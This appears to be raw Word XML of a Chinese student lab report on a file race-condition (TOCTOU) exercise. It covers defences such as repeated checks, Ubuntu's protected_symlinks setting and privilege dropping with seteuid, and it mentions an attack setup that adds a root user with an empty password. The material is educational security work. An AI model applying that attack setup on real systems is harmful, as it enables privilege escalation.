    <w:p w14:paraId="2DA2EB46" w14:textId="4C7CEA85" w:rsidR="002C7832" w:rsidRDefault="002C7832" w:rsidP="004F0E41">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>由于设置test用户为root权限，且密码为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DC582" w14:textId="3C6F1C1A" w:rsidR="0070731C" w:rsidRDefault="0070731C" w:rsidP="004F0E41">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D95E1C6" wp14:editId="2538EC83">
            <wp:extent cx="5274310" cy="9271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E1A0" w14:textId="3F2699F7" w:rsidR="00793EBC" w:rsidRPr="00603B5E" w:rsidRDefault="004F0E41" w:rsidP="00D60E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46ED5C04" wp14:editId="116A5BE7">
            <wp:extent cx="5274310" cy="5073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B899" w14:textId="3E1AACFC" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="559B78AF" w14:textId="77777777" w:rsidR="00FC6B81" w:rsidRDefault="00FC6B81" w:rsidP="00FC6B81">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4871B827" w14:textId="77777777" w:rsidR="00FC6B81" w:rsidRDefault="00FC6B81" w:rsidP="00FC6B81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任务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：保护机制</w:t>
      </w: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>：重复调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B0C80" w14:textId="0BD20031" w:rsidR="00793EBC" w:rsidRPr="00FC6B81" w:rsidRDefault="002F6166" w:rsidP="00D60E78">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-else重复的检查状态</w:t>
      </w:r>
      <w:r w:rsidR="002C78E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果要完成修改，则攻击者需要攻击成功5次才行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24376D6A" w14:textId="171AC253" w:rsidR="00793EBC" w:rsidRDefault="00230F11" w:rsidP="00D60E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="789DA62B" wp14:editId="13ADAE35">
            <wp:extent cx="5274310" cy="27889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A0E" w14:textId="2CE590A3" w:rsidR="00793EBC" w:rsidRDefault="004E2DBD" w:rsidP="00D60E78">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击难度很大</w:t>
      </w:r>
      <w:r w:rsidR="003708AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，没使用保护策略大概几秒钟就成功了</w:t>
      </w:r>
      <w:r w:rsidR="009300D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是使用安全策略</w:t>
      </w:r>
      <w:r w:rsidR="00B41B4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，跑了</w:t>
      </w:r>
      <w:r w:rsidR="00584AA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个晚上也没成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D69B838" w14:textId="1BCD0AA5" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="241E2EAA" w14:textId="34F0F79D" w:rsidR="00793EBC" w:rsidRDefault="00793EBC" w:rsidP="00D60E78"/>
    <w:p w14:paraId="71F21838" w14:textId="77777777" w:rsidR="00E974FB" w:rsidRPr="00E974FB" w:rsidRDefault="00E974FB" w:rsidP="00E974FB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14:paraId="6F9804F1" w14:textId="77777777" w:rsidR="00E974FB" w:rsidRPr="00E974FB" w:rsidRDefault="00E974FB" w:rsidP="00E974FB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黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>：保护机制</w:t>
      </w:r>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>：系统自带保护策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B58234B" w14:textId="44932DA7" w:rsidR="00793EBC" w:rsidRPr="00E974FB" w:rsidRDefault="00E974FB" w:rsidP="00E974FB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ubuntu 16.04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>带有一个内置的防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>竞态条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击的保护机制。在此任务中，需要使用以下命令重新启用此保护：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727A1ECF" w14:textId="363E7CBD" w:rsidR="00E974FB" w:rsidRPr="00E974FB" w:rsidRDefault="00E974FB" w:rsidP="00E974F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kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E974F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E974FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E974F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E974FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fs.protected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_symlinks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AF9CF4" w14:textId="77777777" w:rsidR="00E974FB" w:rsidRPr="00E974FB" w:rsidRDefault="00E974FB" w:rsidP="00E974FB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宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E974FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在报告中，请描述你的观察。请解释以下几问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724ECE5" w14:textId="4B38E525" w:rsidR="00E974FB" w:rsidRDefault="00E974FB" w:rsidP="00A044A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6" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars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A044AF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这种保护方案为什么有效？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03948292" w14:textId="0A2B1B2C" w:rsidR="00A044AF" w:rsidRDefault="00D1238A" w:rsidP="00A044AF">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="16" w:line="240" w:lineRule="auto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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>有效</w:t>
      </w:r>
      <w:r w:rsidR="007E398C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AD03425" wp14:editId="2D16E12E">
            <wp:simplePos x="1145512" y="949569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70192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2B2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FEFFCE" w14:textId="19409C5C" w:rsidR="009B245B" w:rsidRPr="00A044AF" w:rsidRDefault="009B245B" w:rsidP="00A044AF">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="16" w:line="240" w:lineRule="auto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EBB47B1" wp14:editId="712E0459">
            <wp:extent cx="5274310" cy="2212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621" w14:textId="6EF5F661" w:rsidR="00E974FB" w:rsidRDefault="00E974FB" w:rsidP="00FF7CB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16" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars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FF7CB8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这是一个很好的保护吗，为什么或者为什么不？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9E74A" w14:textId="1DD962C3" w:rsidR="00BA6ECC" w:rsidRPr="00BA6ECC" w:rsidRDefault="00BA6ECC" w:rsidP="00F838C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="16" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="36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t>启用sticky符号链接保护时，sticky全局可写目录下的符号链接，只有当 符号链接的所有者(owner)与该链接的跟随者(follower)或该目录所有者相 匹配， 才可以被跟随(follow)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>跟随者:进程的有效用户ID(EUID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD48097" w14:textId="4B76C17A" w:rsidR="00FF7CB8" w:rsidRPr="00FF7CB8" w:rsidRDefault="00FF7CB8" w:rsidP="005210E2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="16" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="36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这个攻击的例子中，漏洞程序是以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>权限运行的，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m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目录的所有者也是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，但符合链接所有者是攻击者本身，不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，所以系统不允许程序使用该符合链接，如果程序视图使用该符合链接，系统会让他崩溃。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA97122" w14:textId="5449C26E" w:rsidR="00E974FB" w:rsidRPr="00E55838" w:rsidRDefault="00E974FB" w:rsidP="00E5583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firstLineChars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55838">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个方案有什么限制？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD5D1B" w14:textId="66FAD512" w:rsidR="00E55838" w:rsidRPr="00E55838" w:rsidRDefault="00E55838" w:rsidP="00E25783">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="36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此保护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机制只适用于人人可写的粘滞（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sticky</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）目录，例如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m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2175B32D" w14:textId="2F45E777" w:rsidR="006D5E18" w:rsidRDefault="006D5E18" w:rsidP="006D5E18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14:paraId="27CD931A" w14:textId="77777777" w:rsidR="005067B0" w:rsidRPr="006D5E18" w:rsidRDefault="005067B0" w:rsidP="006D5E18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黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B678F27" w14:textId="77777777" w:rsidR="006D5E18" w:rsidRPr="006D5E18" w:rsidRDefault="006D5E18" w:rsidP="006D5E18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黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5E18">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5E18">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5E18">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>：保护机制</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5E18">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5E18">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>：使用最小特权原则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0FA982" w14:textId="77777777" w:rsidR="00AB6AFD" w:rsidRPr="00AB6AFD" w:rsidRDefault="00AB6AFD" w:rsidP="00D51FFB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind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B6AFD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>特权程序需要写入一个不需要权限就能写入的文件，程序拥有权限大于实际需要的权限，为防止写入保护文件，程序进行额外的检查，从而导致检查和使用之间的时间窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E69FD8" w14:textId="77777777" w:rsidR="00AB6AFD" w:rsidRPr="00AB6AFD" w:rsidRDefault="00AB6AFD" w:rsidP="00D51FFB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind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AB6AFD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这里最根本的问题在于赋予程序的权限大于实际需求，违背了最小特权原则，一个程序拥有比解决问题所需要的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB6AFD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB6AFD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>权限更多的权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E6ABA1" w14:textId="60A0E225" w:rsidR="00E974FB" w:rsidRPr="00982354" w:rsidRDefault="001F5002" w:rsidP="00982354">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind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82354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>添加四行代码即可：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5998AD4A" w14:textId="77777777" w:rsidR="008D5915" w:rsidRPr="008D5915" w:rsidRDefault="008D5915" w:rsidP="00982354">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto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uid_t</w:t>
      </w:r>
      <w:proofErr w:type="spell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real_uid</w:t>
      </w:r>
      <w:proofErr w:type="spell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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spell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gram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513CE36C" w14:textId="77777777" w:rsidR="008D5915" w:rsidRPr="008D5915" w:rsidRDefault="008D5915" w:rsidP="00982354">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto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uid_t</w:t>
      </w:r>
      <w:proofErr w:type="spell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eff_uid</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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geteuid</w:t>
      </w:r>
      <w:proofErr w:type="spell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gram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17108C2C" w14:textId="3231607C" w:rsidR="001F5002" w:rsidRPr="00591798" w:rsidRDefault="008D5915" w:rsidP="00982354">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto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91798">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seteuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00591798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Pr="00591798">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>real_uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00591798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2B4F4765" w14:textId="0AF696BF" w:rsidR="00FC0A52" w:rsidRPr="00591798" w:rsidRDefault="00FC0A52" w:rsidP="00982354">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto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91798">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>……………</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A488CB3" w14:textId="77777777" w:rsidR="008D5915" w:rsidRPr="008D5915" w:rsidRDefault="008D5915" w:rsidP="00982354">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto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seteuid</w:t>
      </w:r>
      <w:proofErr w:type="spell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eff_uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D5915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2BF1C2ED" w14:textId="74CFCB0C" w:rsidR="00793EBC" w:rsidRPr="00591798" w:rsidRDefault="00793EBC" w:rsidP="00982354">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"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2AD7A1A" w14:textId="3247E71F" w:rsidR="00793EBC" w:rsidRPr="00D60E78" w:rsidRDefault="00546B47" w:rsidP="00D60E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B7A5101" wp14:editId="3A028D33">
            <wp:extent cx="5274310" cy="22110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EBC" w:rsidRPr="00D60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05A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D674B45C"/>
    <w:lvl w:ilvl="0" w:tplc="7A32648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F599D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE785538"/>
    <w:lvl w:ilvl="0" w:tplc="BA50131E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="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A5B25"/>
    <w:multiLevelType w:val="multilevel"/>
